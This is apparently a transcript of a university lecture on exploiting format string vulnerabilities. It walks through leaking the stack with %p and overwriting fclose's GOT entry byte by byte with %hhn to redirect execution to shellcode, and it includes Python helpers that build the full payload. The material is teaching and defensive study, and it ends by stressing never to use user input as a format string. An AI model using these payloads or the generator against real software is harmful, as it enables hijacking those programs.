It says OK, you want an A, an A, an A, an A, then the B's, the C's, and the D's. Then what is it printing out? It's interpreting the first element on the stack as what? The first %p is going to get whatever sits where the first argument to printf would be. And then come all the 41's, right? 41's, 42's, 43's, 44's. And then what's after that? I asked you, Daniel. Do you guys remember this? The four A's, four B's, four C's, four D's. The 41's? Yeah, but what's after that? What's after the 44's? What was that? The percent p. Yes, the percent p. So 0x25, I know, is percent, and lowercase p is 0x70. So we actually see something interesting. We see four A's, four B's, four C's, four D's, and then 0x1. So what is that 0x1, and where did it come from? How many %p's did we do? So what's the first one? What's the output of the first %p? Maybe. But in this output that we got, the output of printf, what is the output of the first %p? Yeah? No, I don't think so. It doesn't matter what it is, but in the output, which one is it? The first one? That's the 0x1, right? It's the first thing before the bold part. So the first %p output 0x1. Whatever that is on the stack, it may actually be standard output. And then above that is 0x41414141, which is four A's, and then there are the four B's. So this is the first %p, second %p, third, fourth, fifth, sixth, seventh, and eighth. Ooh, that worked out. So when we get to here, in bold, where is that? We're on the stack, but what is it that we're printing out? It's our input; it's our format string on the stack. So who controls these values? We do. And with %n, how do we write to an address? Where does that address have to be for us to write to it? It has to be somewhere on the stack.
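One way to check that the leaked words really are the format string is to turn each %p value back into bytes. This Python sketch assumes a 32-bit little-endian target, as in the lecture; the helper name `decode_word` is made up for illustration, and the value 0x70257025 is what one would expect to see right after the D's if the input continues with "%p%p" with no separators, which is an assumption about the exact input.

```python
import struct


def decode_word(word):
    """Return the 4 bytes that a leaked 32-bit little-endian word holds in memory."""
    return struct.pack("<I", word)


print(decode_word(0x41414141))  # b'AAAA'
print(decode_word(0x44444444))  # b'DDDD'
print(decode_word(0x70257025))  # b'%p%p'
print(hex(ord("%")), hex(ord("p")))  # 0x25 0x70
```

Seeing our own A's, B's, C's, D's, and percent signs come back is the evidence that those stack slots are attacker-controlled.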
And so we know that the second argument on the stack, and the third and the fourth and the fifth, are values that we control, right? So we can put any address we want there, and then if we use a %n instead of a %p, it will write to that address. So the question then is what to overwrite. We could try to write on the stack: we could try to overwrite the saved EIP so that it points at some shellcode. That's kind of hard, right? We've talked about it; we have to get it exactly right. And unlike a buffer overflow, we can't just spray a bunch of copies of the address we're trying to hit and hope. We have to put in exactly the memory location we want to overwrite, in place of those A's, as we'll see in a second. So we can go back to our lovely friend, the global offset table, which has the addresses of all the dynamically linked functions. We can print out the relocation table for this format string program, and we can see we have __gmon_start__, __libc_start_main, read, fclose, fopen, fprintf, and exit. These are all dynamically linked into the program. And the way to read this table is that the left column says that in memory at location, let's say, 0x080497e4 will be the address of the function exit. So when we call exit, we're going to jump to whatever is stored at that memory address, 0x080497e4. We can actually look at this. If we look at the program with objdump, we can see that the call to fclose is calling 0x804839c, because that is its entry in the procedure linkage table. Hang on, let me find that. Ah, there we go.
So the call to fclose is jumping into the PLT, the procedure linkage table, which then uses this 0x80497d8. Let's go back and check. Yes, 0x80497d8, which is the global offset table entry for fclose. If we go back and read this again, it's saying jump, and the star dereferences: get whatever is at that memory location, 0x80497d8, and start executing from there. So it's an indirect jump, right? We're jumping to whatever address is stored at that memory location, and then it does other stuff. And this 0x80497d8 was in the GOT. So why are we looking at fclose? When is fclose called in the original program? That's right, after we're done logging. Even if we changed some value in the global offset table for, say, fopen, if fopen isn't called after we do the format string, nothing is going to happen. But we know that fclose is going to be called. So if we can overwrite the entry for fclose, we can change the way this program executes: we can get it to execute our shellcode instead of going to fclose. So the idea is that we want to control whatever is at that memory location, d8. I don't know why it's d8. So what can we do? We know that it's the second %p that gets us to our input, right? And with this, do I have to worry about my environment changing and the stack changing? No, I'm not passing any arguments in here. It's reading from standard in, so I'm not changing any of the arguments. Cool. So I can do a %2$p. Now I want to think like a scientist: I'm creating a hypothesis, and I'm asking what this test is going to show me if it's correct and what it's going to show me if it's incorrect. So what do we think this is going to be if this is correct? What am I looking for? What should the output be? 0x41414141. And we also got all the A's, B's, C's, and D's, and then that part.
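The indirect jump through the global offset table can be pictured with a toy model. The Python below is only an analogy, not how the loader works internally: the dictionary `memory` stands in for the GOT, the two functions stand in for the real fclose and for shellcode, and `call_via_plt` is a hypothetical name for the PLT stub's "jump to whatever is stored in this slot" behavior. The slot address is the one quoted in the lecture.

```python
def real_fclose():
    return "fclose ran"


def shellcode():
    return "shellcode ran"


GOT_FCLOSE = 0x080497D8              # slot address quoted in the lecture
memory = {GOT_FCLOSE: real_fclose}   # toy GOT: slot address -> jump target


def call_via_plt(got_slot):
    # Like `jmp *got_slot`: fetch the target from memory, then go there.
    return memory[got_slot]()


before = call_via_plt(GOT_FCLOSE)

# An arbitrary write (what %n provides) replaces the contents of the slot.
memory[GOT_FCLOSE] = shellcode
after = call_via_plt(GOT_FCLOSE)

print(before)  # fclose ran
print(after)   # shellcode ran
```

The call site never changes; only the data in the slot does, which is why the overwrite has to happen before the next call to fclose.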
Okay, so we've got to remember that this part of the string is going to show up in the output each time. So now, we said we want to try to overwrite fclose, right? So instead of four A's, what should we have here? Yeah, the address that we want to overwrite: we want 0x080497d8. So what we're going to do is use \x08\x04\x97\xd8. OK, the other way around, because of endianness. So we want to print out \xd8\x97\x04\x08, then four B's, four C's, four D's, and then %2\$x. Why can't you just use $x here? Because $x is a bash variable, so bash is going to get in your way and change it. So now what do we expect to be output here? First we should see garbage, whatever those bytes are, then we should see four B's, four C's, four D's, and then we should see 080497d8, right? This is good because it validates that we actually put the memory address in there correctly. This is why I like to operate just like when writing a program. You start with something small, a small function, you test it, you make sure that it works, and then you write other functions that call that function. If I try to sit down and write the whole thing at once, it just never works. So here I'm building it up piece by piece. So now, if I change that x to an n, what do I expect to happen? First of all, what is it going to write at 0x080497d8? Think hard about it. It should be 16, right? Four bytes, four bytes, four bytes, four bytes. And the other thing to remember is that we're changing this %x to a %n, so we're not going to see anything printed for it. Instead, we're going to write to whatever address is in the second argument, and the value should be 16 characters. I don't know, something could have messed things up, but I'm pretty sure it's going to be 16, so let's see.
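Getting the byte order right by hand is error-prone, so it can help to let a library do the packing. This is a minimal Python sketch, assuming a 32-bit little-endian target; the helper `pack_addr` and the variable names are illustrative, and building the payload in Python also sidesteps the shell's handling of the dollar sign.

```python
import struct


def pack_addr(addr):
    """Pack a 32-bit address in little-endian byte order."""
    return struct.pack("<I", addr)


got_fclose = 0x080497D8
prefix = pack_addr(got_fclose) + b"BBBBCCCCDDDD"

read_test = prefix + b"%2$x"    # step 1: confirm the address is argument 2
write_test = prefix + b"%2$n"   # step 2: write the character count there

print(pack_addr(got_fclose))    # b'\xd8\x97\x04\x08'
print(len(prefix))              # 16, the value %n would store
```

The 16-byte prefix is also why the first %n test is expected to store 16 at the target address.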
But what do we expect is going to happen when we run this? It should segfault when we get to the fclose, not when we write, right? We see it does this, and apparently the output here is missing the segfault, but it should segfault. We can run this in GDB. First we write the input out to a file, then we run GDB on this format string program and run it with the input redirected from test. We'll see that we received a segmentation fault, and if you look at the registers, you can see that EIP is 0x10, which is 16. Is that what we wanted? So now we're able to completely control EIP, right? We can see from here that, because we changed that value in the global offset table, we can redirect the control flow of this program to execute wherever we want. Do we want it to execute at address 16? No, we want it to be the address of our shellcode. So the field width comes to our rescue: we use %200x. That will print out whatever value is on the stack and pad it with spaces so the total is 200 characters. So the problem is, let's say the address of our shellcode is 0xffffcaf5. The system I was running this on is a 64-bit system; on a 32-bit system the stack addresses start at bf, but here they start at all f's. So the number would be 4,294,953,717, which is a total of about 4.3 gigabytes. So you think, well, will this work? Yeah, actually, it will probably work, but you're literally going to cause the file system to write out four gigs of data. Or if you're doing this remotely, to even get a response back, it's going to have to send you four gigs of just spaces. I've actually tried to do this before; it did kind of work, but it's not great. So how many bytes are we trying to write? Four bytes. We need to control four bytes in the global offset table.
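The cost difference between writing the whole address with one %n and writing it one byte at a time can be checked with a little arithmetic. This Python sketch uses the lecture's numbers (target value 0xffffcaf5, 16 characters already output); the function names are hypothetical, and the byte-wise count ignores the practical detail that a padded %x cannot print fewer characters than the value needs.

```python
def one_shot_output(value):
    """Characters that must be output for a single %n to store `value`."""
    return value


def bytewise_output(value, already_written):
    """Total characters output when storing `value` as four single-byte
    writes, most significant byte first, letting the count wrap mod 256."""
    written = already_written
    for byte in value.to_bytes(4, "big"):
        written += (byte - written) % 256
    return written


shellcode_addr = 0xFFFFCAF5
print(one_shot_output(shellcode_addr))      # 4294953717
print(bytewise_output(shellcode_addr, 16))  # 501
```

Roughly 4.3 billion characters versus about 500 is the motivation for the byte-at-a-time approach.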
So instead of writing this 0xffffcaf5 all at once, why don't we split it up into four different writes and just write a byte at a time? We can write ff, then ff, then ca, then f5. If you remember, we have four different slots, the four A's, four B's, four C's, and four D's, in the format string. So, more man page stuff. There's actually a way to do this: there's a modifier you can put in, %hh, in front of anything, x or d. I think h is like a short, and hh is a short short or something. It says that you want to output just a char as x. In this case, with n, it means you want to write to a char pointer, a signed char. And this way, we'll only write out one single byte, and we're going to address each of these bytes separately. So we know we've already output 16 bytes, and let's say we want to write in this order: ff, ff, ca, f5. I'm probably not going to have enough time to go through this carefully, but I want to finish this material, because it doesn't make sense to come back to it later. So we know we're at 16 bytes of output, and we know we want to get to 0xff, so we do simple subtraction. That says we need 239 more characters of output. So we can use a %239x right before we do a %2$hhn to write the value ff at the memory location that we want. Let's look at this. We can see that our format is the same: we have the address we want to write to, four B's, four C's, four D's. At this point in the output, we have output 16 bytes. Then we do %239x, which is going to output another 239 characters. So 239 plus 16 should be 255. And then we do a %2$hhn to write one single byte of ff at that location. So we can do this and run it in GDB.
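The subtraction for a single-byte write can be written down once and reused. This is a small Python sketch using the lecture's numbers; `pad_for_byte` is an illustrative name, and the modulo is there so the same helper also works when the count has to wrap past 255.

```python
def pad_for_byte(target, written):
    """Extra characters to output so that (written + pad) % 256 == target."""
    return (target - written) % 256


written = 16                        # 4-byte address + BBBB + CCCC + DDDD
pad = pad_for_byte(0xFF, written)
fmt = f"%{pad}x%2$hhn"              # pad the output, then store one byte

print(pad)            # 239
print(written + pad)  # 255
print(fmt)            # %239x%2$hhn
```

Because %hhn stores only the low byte of the running count, the target byte is always reachable with at most 255 extra characters.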
We'll see we get a SIGILL, illegal instruction, because it's trying to go to 0x080483ff. What's the problem here? Which byte did we overwrite? Did we overwrite with the right value? Yes. Did we overwrite the right byte? No, because we changed the least significant byte, and we wanted the ff to be the most significant byte. So we add three to the address: d8, d9, da, db. We're going to move three bytes up from where we were writing. So instead of writing to the least significant byte, we write to the most significant byte. Now we run this again, and we should see, ah, there we go. We've received a segmentation fault at 0xff048382. So, perfect, we've controlled the first byte and set it to ff, and we wanted ff, ff, something, something. The second ff is really easy to get, right? Because how many characters have we output so far? 256? Well, 255. Yeah, still 255. So now we change the next four bytes here: instead of B's, we're going to put 0x080497da. So it's one byte below db, and this should be the second most significant byte. Remember, %n writes; it doesn't output anything. So the total number of characters we've output is still 255. Now, when we run this, we see we've controlled ff, ff. So we've controlled the first two bytes. This is where we end up instead of fclose: we have ff, ff, and then two bytes we haven't set yet. We want 0xffffcaf5; I got lost in the f's. So then, how do we get the counter to go from ff to ca? Did we screw up? We can overflow it, yeah, because it's only going to write one byte. Even if we output more than 256 characters, it's only going to write the least significant byte of the number of characters that we've output. So to change from ff to ca, the counter has to wrap around. So we've written ff.
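Why the first single-byte write hit the wrong end of the address follows directly from little-endian layout, and a few lines of Python can reproduce both outcomes. This is a sketch with assumptions: the dictionary is a stand-in for process memory, the helper names are made up, and the original slot contents 0x08048382 are inferred from the two fault addresses quoted in the lecture rather than stated there.

```python
import struct

GOT_FCLOSE = 0x080497D8


def fresh_memory(initial_word):
    """Lay out a 32-bit word at GOT_FCLOSE in little-endian byte order."""
    raw = struct.pack("<I", initial_word)
    return {GOT_FCLOSE + i: raw[i] for i in range(4)}


def read_word(memory, addr):
    return struct.unpack("<I", bytes(memory[addr + i] for i in range(4)))[0]


initial = 0x08048382  # assumed original contents of the slot

mem = fresh_memory(initial)
mem[GOT_FCLOSE] = 0xFF            # first attempt: lowest address
low = read_word(mem, GOT_FCLOSE)

mem = fresh_memory(initial)
mem[GOT_FCLOSE + 3] = 0xFF        # second attempt: address + 3
high = read_word(mem, GOT_FCLOSE)

print(hex(low), hex(high))  # 0x80483ff 0xff048382
```

The lowest address holds the least significant byte, so the most significant byte of the word lives at the slot address plus three.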
So to get back to zero, we need one more character. We add 0xca to that, and that gives us 203. So now we do %239x, which gets us to ff, and we write the first byte. We write the second one. Then we do %203x, which is going to wrap the counter around so we get to ca, and then we do a %4$hhn, which writes through what was all C's and is now 0x080497d9, one below da. So this should overwrite this byte here and change it to ca. But actually, when I ran this, it already worked. And why? You said NOP sled. NOP sled, that's awesome. I don't have to land exactly on my shellcode. I think in this example my NOP sled was more than 256 bytes, so I didn't need the last byte at all. I was able to land in there. So, yeah, this runs, and everything works. There was an attack very similar to this example, called a locale attack. In your shell, you can change your locale to a different value, like setting the language to it_IT, and you could use a huge percent string to output the memory of this locale program. There's also another really recent vulnerability, from like 2012, in the sudo command. sudo had a printf vulnerability on argv[0]. So you could exec it and pass in your own argv[0] value containing format directives, and it would trigger a format string vulnerability. That was in there for a long time; it was just recently found. So people could use this vulnerability to get extra information out of sudo. So never, ever, ever, ever pass user input as the format string to a printf-style function. That's it. Passing the user's buffer as the format argument is bad; passing a constant format like %s with the buffer as an argument is good. It seems silly, because it seems like such an easy thing to get right, and yet it happens again and again, and it's still super relevant. Now we've covered pretty much the whole range of different types of vulnerabilities.
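Putting the pieces together, the whole four-write payload can be generated rather than assembled by hand. The Python below is a sketch under several assumptions: a 32-bit little-endian target, the four addresses sitting at printf arguments 2 through 5 as in the lecture's example, and a hypothetical helper name `build_payload`. It follows the lecture in mixing a plain %Nx with numbered %k$hhn directives, and it bumps very small pads by 256 because a padded %x can print up to 8 hex digits regardless of the requested width.

```python
import struct


def build_payload(target_addr, value, first_arg=2, min_pad=8):
    """Build a format string that stores the 32-bit `value` at `target_addr`
    using four %hhn writes, most significant byte first."""
    value_bytes = struct.pack(">I", value)            # e.g. ff ff ca f5
    addrs = [target_addr + 3 - i for i in range(4)]   # ...db, ...da, ...d9, ...d8
    payload = b"".join(struct.pack("<I", a) for a in addrs)
    written = len(payload)                            # 16 characters so far
    for i, byte in enumerate(value_bytes):
        pad = (byte - written) % 256                  # wraps past 255 if needed
        if 0 < pad < min_pad:
            pad += 256                                # keep width >= 8 hex digits
        if pad:
            payload += f"%{pad}x".encode()
            written += pad
        payload += f"%{first_arg + i}$hhn".encode()   # store low byte of count
    return payload


payload = build_payload(0x080497D8, 0xFFFFCAF5)
print(payload[16:].decode())  # %239x%2$hhn%3$hhn%203x%4$hhn%43x%5$hhn
```

The 239 and 203 match the pads worked out in the lecture; the final 43 is what the same arithmetic gives for the f5 byte, which the lecture's run did not end up needing because of the NOP sled.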
If you want to go deeper, there's material in the slides that I skipped over that's relevant. Next, on Monday, we're going to cover advanced memory protections, and we'll talk about return-to-libc, and ROP, and ASLR, and stack canaries, and all this kind of cool stuff. Yeah? So, after this, do we have enough to finish things up? Yeah, all the way up. Getting level 16 requires a lot of manual work.